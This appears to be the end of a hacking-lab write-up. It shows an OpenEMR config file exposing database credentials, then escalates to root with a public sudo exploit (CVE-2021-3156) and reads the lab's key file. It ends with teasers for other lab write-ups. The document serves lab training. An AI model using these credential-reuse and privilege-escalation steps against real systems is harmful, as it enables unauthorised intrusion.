$login = 'openemr_user';
$pass = 'P@ssw0rD1$85!';
$dbase = 'openemr';
//Added ability to disable
//utf8 encoding - bm 05-2009
global $disable_utf8_flag;
$disable_utf8_flag = false;
$sqlconf = array();
global $sqlconf;
$sqlconf["host"]= $host;
$sqlconf["port"] = $port;
$sqlconf["login"] = $login;
$sqlconf["pass"] = $pass;
$sqlconf["dbase"] = $dbase;
//////////////////////////
//////////////////////////
//////////////////////////
//////DO NOT TOUCH THIS///
$config = 1; /////////////
//////////////////////////
//////////////////////////
//////////////////////////
?>sh
emrvpsadmin@records:/var/www/html/sites/default$ mysql -u 'openemr_user' -p'P@ssw0rD1$85!'sudo CVE-2021-3156
- https://github.com/worawit/CVE-2021-3156
sh
unzip CVE-2021-3156-main.zip -d ./sh
scp -i id_rsa -r CVE-2021-3156-main/ emrvpsadmin@10.11.1.30:/home/emrvpsadminsh
emrvpsadmin@records:~/CVE-2021-3156-main$ ./exploit_nss.py
# whoami
rootsh
emrvpsadmin@records:~/CVE-2021-3156-main$ ./exploit_nss.py
# whoami
root
# cat /root/key.txt
9416snu86rmffnkx290j
# date
Wed Feb 12 06:38:32 UTC 2025
Up next
MediumFeb 2025
VHL — CMS02
Drupal 8 on CentOS. Exploited Drupalgeddon2 (CVE-2018-7600) for unauthenticated RCE and escalated privileges via SUID binary.
Read writeup
EasyFeb 2025
VHL — Aaron
Windows 10 Enterprise with SMB and RDP exposed. Credential brute-force via SMB leads to remote code execution and full system access.
Read writeup
EasyFeb 2025
VHL — Crash
GravCMS on Ubuntu. Unauthenticated scheduler RCE CVE allows arbitrary command execution as the web user, then sudo privesc.
Read writeup